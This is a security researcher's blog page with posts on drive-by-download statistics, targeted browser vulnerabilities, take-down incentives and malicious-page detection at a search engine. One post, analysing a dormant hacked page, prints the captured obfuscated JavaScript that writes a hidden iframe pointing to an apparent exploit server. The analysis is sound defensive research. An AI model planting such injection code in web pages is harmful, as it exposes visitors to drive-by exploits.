About

Welcome to Christian Seifert's computer security research blog. The focus lies on malicious servers and the client honeypot research area.

   View Christian Seifert's profile on LinkedIn

Last Comments

mnajem (Research Proposal…): Hello bro, I would like …
mnajem (New book on honey…): I already have this book.…
Christian Seifert… (Caching of web re…): Note that the ignore-no-s…
noob (Injection of clie…): Is this really worth a wr…
Christian Seifert… (SHELIA: A Client …): lol ... yes, I know. We a…
Bob Dole (SHELIA: A Client …): Is powerpoint a "client a…
bobdole (Suggestions on ho…): I think dre is also sayin…
Christian Seifert… (Suggestions on ho…): Dre, here the requested l…
dre (Suggestions on ho…): do you mean L.M.H. of the…
Christian Seifert… (Suggestions on ho…): A few weeks I had my hand…

Search

Search for words used in entries on this website

Calendar

« February 2010
S M T W T F S
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28            

Archives

01 Apr - 30 Apr 2007
01 Dec - 31 Dec 2008
01 Jan - 31 Jan 2009
01 Apr - 30 Apr 2009

Miscellany

XML Feed (RSS 1.0) 

10 April 09 - 07:38Microsoft publishes version 6 of the Security Intelligence Report

Microsoft has just published its latest Security Intelligence Report (version 6 covering the second half of 2008.) I was involved as a contributing author of that report. It contains some information on malicious web pages and attacks on browsers that may be of interest.
  • Live Search identified more than 1 million drive-by download pages per month since early 2H08 or 0.07% of pages inspected
  • Geographical distribution shows elevated number of malicious hosts in the .cn TDL
  • A minority of exploit servers are responsible for a majority of drive-by-download pages.
  • Exploit servers can be responsible for 10,000 + drive-by-download pages.
  • The top attack vector on browsers is the Adobe Flash Vulnerability (CVE-2007-0071) accounting for over 10.3% of browser attacks. (A stark reminder that people should patch also their applications; I personally recommend Secunia's Personal Software Inspector (available at http://secunia.com/vulnerability_scanning/personal/.
The report is available at http://www.microsoft.com/sir.

christianS - Security - No comments / No trackbacks - §

09 January 09 - 14:09Dormant Malicious Web Pages

Today I was analyzing a web page that we identified as part of a study on the New Zealand Internet. This web page was first identified as malicious in April 2008. It continued to exhibit malicious behavior until June 2008 and then did not exhibit malicious behavior until the rest of the year.

An investigation of the web page revealed nothing too exciting. It contained the following JavaScript snippet:

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%30%39%31%63%32%66%37%61%63%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%31%38%38%29%2b%27%35%31%37%35%37%5c%27%20%77%69%64%74%68%3d%38%37%20%68%65%69%67%68%74%3d%33%32%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));

which turned into an iframe that sources a page from http://traffurl.ru/sliv?2539551757, which probably hosts the actual exploit.

As of today, the page seems to have been unaltered compared to April 2008, but it is not exhibiting malicious behavior anymore. Digging into it further, reveals a simple explanation: the server traffurl.ru is not accessible anymore (the hostname doesn’t resolve).

I think there is an interesting take on this. The page appears clean, but really it has been hacked and abused. The webmaster obviously hasn’t taken any action to clean up the page nor to secure his site. As such, I think these pages are ticking time bombs, because the original vulnerabilities that allowed the site to be hacked is still likely to exist and as a result its just a matter of time until the page gets "updated" with a working exploit server….

christianS - PhD Research - No comments / No trackbacks - §

16 December 08 - 11:55The Impact of Incentives on Notice and Take-down

I've just read the paper from Tyler Moore and Richard Clayton on "The Impact of Incentives on Notice and Take-down." In this work, Moore and Clayton look at a variety of illegal web pages and analyze how long it takes for these web pages to be taken down as a result of a take-down request. They compare data from different types of web pages (from phishing, to child abuse, illegal pharmacy sites, etc.) and also look at the underlying technology used (shared hosting, fast-flux domain, etc.).

Phishing sites, for instance, are taken down very quickly compared to, for instance, illegal pharmacy sites. This is independent of the underlying technology. So sophisticated phishing site that uses fast-flux network, for instance, is still taken down more quickly than an ordinary illegal pharmacy site that is hosted on a shared hosting provider. The authors conclude that the primary force that drives how quickly an illegal site is removed is the incentive behind removal and not so much the technology used by the attacker. So, the quick removal phishing sites can be explained by the commitment by the banks to removal. The risk of fraud, danger to the brand and loss of trust into online banking leads to the bank investing resources to make sure take down happens; on the illegal pharmacy, who would be the driving force? The lack shows in long up-times of these sites.

Taking this into the realm of malicious exploit servers, who would be the driving force? Who has the incentive to invest resources into take down? If noone does, why not?

christianS - Security - No comments / No trackbacks - §

13 December 08 - 16:20What browser plugins are targeted as part of drive-bys?

I was always wondering what is the best way to configure my vulnerable system to catch most malicious web sites with my client honeypot. The Microsoft Security Intelligence Report (January to June 2008 - available at http://www.microsoft.com/sir) now includes information about what vulnerabilities are targeted. On page 33, the following vulnerabilities are listed:
  1. MS06-014—MDAC_RDS (12%)
  2. CVE-2007-5601—RealPlayer_IERPCtl (7%)
  3. CVE-2007-4816—BaoFengStorm_rawParse (7%)
  4. CVE-2007-0015—Apple_Quicktime_RTSP (6%)
  5. CVE-2007-4105—BaiduToolbar_DloadDS (5%)
  6. CVE-2008-1309—RealPlayer_rmoc3260_Console (5%)
  7. GLChat.ocx_ConnectAndEnterRoom (4%)
  8. MS06-071—MSXML_setRequestHeader (4%)
  9. CVE-2007-4748—PowerPlayer_Logo (4%)
  10. CVE-2006-5820—AOL_SuperBuddyAX (3%)
  11. Other (43%)

As you can already tell, some of the vulnerabilities are specifically targeted at the Chinese locale. According to the report, the most common locale for victims was indeed the Chinese locale (47%) followed by U.S. English with 23 percent.

For more details and details around the methodology, I refer to the report itself ...

christianS - PhD Research - No comments / No trackbacks - §

08 December 08 - 09:20ATNAC 2008: Identification of Malicious Web Pages With Static Heuristics

As part of my PhD research, we published a paper at Australasian Telecommunication Networks and Applications Conference (ATNAC 2008). The paper is based on the work I did at the end of 2007 and looks at ways to identify malicious web pages that launch drive-by-download attacks by inspecting static heuristics on the page denoted by the URL.

Abstract: Malicious web pages that launch client-side attacks on web browsers have become an increasing problem in recent years. High- interaction client honeypots are security devices that can detect these malicious web pages on a network. However, high-interaction client honeypots are both resource-intensive and known to miss attacks. This paper presents a novel classification method for detecting malicious web pages that involves inspecting the underlying static attributes of the initial HTTP response and HTML code. Because malicious web pages import exploits from remote resources and hide exploit code, static attributes characterizing these actions can be used to identify a majority of malicious web pages. Combining high-interaction client honeypots and this new classification method into a hybrid system leads to significant performance improvements.

christianS - PhD Research - No comments / No trackbacks - §

04 December 08 - 07:30Live Search flags malicious web pages

As some of you might know, I am now working at Microsoft's search engine: Live Search. Not surprisingly, I am working on detection of malicious web pages. This week, that work had its visible release (see the Live Search blog posts: http://blogs.msdn.com/livesearch/archive/2008/12/02/battling-the-plague-of-the-web.aspx & http://blogs.msdn.com/livesearch/archive/2008/11/25/webmaster-tools-now-sniffing-for-malware.aspx).

Malicious web pages are now flagged on the results page. The result link that would take you normally to a web page now takes you to a warning. Showing a warning instead of removing the links from the results page is driven by the fact that many of the malicious pages are hacked pages with relevant content to the user's query, so users have the option to accept the risk and navigate to the site (secure practices significantly reduces the risk)

The warning also has an additional effect. It informs innocent webmasters about the fact that their site has been hacked and enables them to remove the malicious content from their site and take action that the site will not be abused by attackers in the future (also see the paper Reinterpreting the Disclosure Debate for Web Infections.) The approach taken by Webmaster Tools takes this even further into the B2B world. It allows webmasters to monitor the sites a webmaster's site has a relationship with (established via outbound links). In case a web site has been detected to be malicious, a webmaster can either encourage that site to clean itself or a webmaster could remove the outbound links to that site. This will further increase the safety of the world wide web.

christianS - Security - No comments / No trackbacks - §

28 November 08 - 07:54Oliver Day's post on Microsoft's Stance on Piracy and Patching

Last week, I stumbled into an interesting guest post blog entry from Oliver Day, a staff security researcher at stopbadware.org, at SecurityFocus. He makes a case that Microsoft's policy of barring piracy copies of Windows from downloading patches is a counter-productive policy when it comes to securing computer systems and making the Internet a safer place. The comments on the post are pretty antagonistic. I think the commenters are missing the point. If illegal copies are out there, and Microsoft takes action to discourage patching, vulnerabilities will continue to exist out there. With the existence of these vulnerabilities, attackers will invest resources to attack these vulnerabilities. With these attacks out there, the Internet is a more dangerous place; for piracy Windows users as well as legitimate users. If patching would be easy and available to all without negative consequences, legitimate users would effectively be more safe…and isn’t that what we want?

christianS - Security - No comments / No trackbacks - §

27 November 08 - 04:561st Pacific Rim Cyber Defense Competition Video Online

Back in April 2008, we had our 1st Pacific Rim Cyber Defense Competition. The event was organized by Barbara Endicott-Popovsky, her Center of Information Assurance & Cybersecurity, and an army of volunteers from different institutions (including Vic with myself.) The event was held on the Microsoft campus. The video of the competition was just published on the UW TV web site and nicely conveys the excitement of everybody at the event. (Its located here: http://www.uwtv.org/programs/displayevent.aspx?rid=27982&fid=5856). I am very proud to have been part of this events and looking forward to competitions in the future.

christianS - Security - No comments / No trackbacks - §

Client Honeypot CSE

Links

Blogs

Client Honeypots Security Links Misc Links

Linkdump